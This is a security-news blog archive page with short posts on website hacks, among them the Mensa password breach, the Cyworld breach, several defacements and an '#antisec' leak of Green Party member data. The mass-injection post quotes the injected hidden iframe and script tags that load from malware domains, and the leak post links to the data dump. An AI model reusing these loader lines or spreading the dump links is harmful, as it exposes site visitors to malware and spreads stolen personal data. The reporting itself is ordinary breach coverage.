Search This Blog

Showing posts with label Website Attack. Show all posts

Mensa Website Hacked After Britain’s Smartest Folk Failed To Secure Passwords

 

The community of British Mensa, which is popularly known for its people with high IQs, they have failed to secure the passwords on their website properly and it has resulted in a massive heck of their sensitive credentials including their member’s personal data. 

According to the former director and technology officer at British Mensa, Eugene Hopkinson has made a statement that the organization had failed to secure the data of its 18,000 members accurately, the report reads in the FT. 

Hopkinson claimed, “that the stored passwords of Mensa members were not hashed, potentially allowing hackers to unscramble them”. The unprecedented security attack has become all the more serious this week when the people of the community acknowledged it had been the victim of a cyber attack. Currently, the Mensa website is unavailable and a message is displaying on the website which notifies that “site under maintenance”. 

In an emergency directors’ meeting, a Mensa member told the FT that “it was confirmed that the Mensa site had been hacked this morning, using the credentials of one of the organization’s directors. It was also confirmed that there were lots of Mensa members’ passwords stored in plain text. The society had sent him his password in plain text within the past year”. It has also been observed that several stashes of Mensa personal credentials have been posted onto the Pastebin website, whilst some data have been removed from the website. 

Hopkinson told the FT that “the Mensa website held lots of sensitive information on its members, including payment details, instant messaging conversations, and IQ scores of both current members and failed applicants. “If a breach is found to have taken place, I have no faith that the [Mensa] board and office will report it adequately... or take sufficient mitigating action to prevent further harm,” Hopkinson has written this in an open letter announcing his resignation. A fellow board member resigned in protest at the same issue. Meanwhile, a spokesperson for Mensa told the FT that “the data such as members’ passwords had been encrypted and that the organization was in the process of hashing passwords,”

Additionally, “the spokesperson has denied that passwords were ever sent out in plain text and that it had handed details of the cyberattack to Britain’s Information Commissioner with a view to pursuing a criminal investigation”. Mensa is a non-profit organization, which is only open to those people who score high marks in standardized IQ test such as in the 98th percentile

Press Release from Freedom fights and the Green party hacked

@ForFreed0m has released a press release and dump of info from the Green Party in name of #antisec.

This is what they said:
To every man, woman & child… We want an end to the glamorization of negativity in the media. We want an end to status symbols dictating our worth as individuals.

We want a meaningful and free universal education system. We want substance in the place of popularity. We will not compromise who we are to be accepted by the crowd. We want the invisible walls that separate by wealth, race & class to be torn down. We want to think our own thoughts. We will be responsible for our environment.

Dear internetz, today we bring you our release from “Freedom Fighters”. I laugh at the New World Order trying to enslave us via the media and politicians lying, we want an end to the biased press whom want to destroy our freedoms via fear. Fear is the way how the globalist’s want to control us, controlling our laws and establishing a police state which is what we are fighting against. We want our god given rights on privacy and being able to use our founding laws to control the government, not the government controlling us. We don’t want the government to be groping us in airports, we don’t want the government to enforce statutes to support the bankers but not support the citizens, we want a free government who listens to the citizens of the situating country and not listen to the globalist’s. This is why humans have revolutions for example: Libya. The Libya citizens fought up against the regime because they thought they were being suppressed and cruelly controlled. That is because we are humans and not robots, good day to you.

Our twitter: @ForFreed0m GO THERE FOR UPDATES

The Release Details:-

Oh herro Green Party, we just hacked you #Antisec

FirstName LastName Address Address2 CityHome StateHome ZipHome Phone Ofice_Email Gender Ethnicity Sexuality Under30 Disabili Active

Good day ‘ole chaps

DOWNLOAD HERE: http://www.mediafire.com/?rjzt1sc1uvlt41d

Pastebin Link:http://pastebin.com/HeZt8kXP

South Korean Social network hack left 35 million users data at risk

South korean Social network Cyworld website hack left 35 million users personal info at risk.

Names, email addresses, phone numbers and other details may be compromised by the hackers.


South Korean police are reportedly launched the investigation on the cyworld hack.

 "By any standard this is a massive attack and one of many in recent months where the finger has been pointed at hackers based in China. It's too early to say whether this attack is politically motivated or merely an attempt to steal personal information for financial gain." The register quoted Mark Darvill, director at security appliance firm AEP Networks as saying.

There are approximately 49m people in south Korea that means more than 80% people affected by this hack attack.

SPINNPHR hacked By Inj3ct0r


SPINN, Secure Personal Information and Notification Network, is a confidential and secure online service that allows you to access and organize your health information.

When i tried to visit the SPINN's website(spinnnphr.com) , the page displayed an image that contains the text "INJ3CTOR". 

It appears the hack was done by the inj3ct0r team.  They've placed a website link near to the SPINN logo .

I took a screenshot of the defaced website. At the time of writing, the website still shows the defacement page. Here is the screenshot i took :

90000 Web Pages Infected by Mass IFrame Injection

Security Experts Wayne Huang, Chris Hsiao, NightCola Lin discovered the Massive Iframe attack on commerce websites. There is more than 90000 websites infected by this attack. All infected websites pointing to willysy.com.

Google indicates more than 90,000 infected pages (note it's pages not domains)


Massive Injection:
initially it was:

<iframe src="hxxp://willysy.com/images/banners/" style="position: absolute; visibility: hidden;"></iframe>

Later it became:
<script src="hxxp://exero.eu/catalog/jquery.js">
</script>

As per armorize, the infected websites redirected to some other malware domain and downloads malwares to client system.

Screenshots of Infected Pages:




Video :


source:armorize

Hackers defaced PNRI website

Unknown hackers break into the Philippine Nuclear Research Institute(pnri.dost.gov.ph) .

When users tried to visit the PNRI website , they got a pop message "Go PNoy. You can do it," instead of normal page.

"Other popup messages included 'shouts' to hacker groups PrivateX, Philkers, Blackrain, and MjM."Gmanetwork report reads.

Once user click the popup message, they were brought to the defacement page.  The defacement page contains the logos PrivateX and Philker, with music in the background.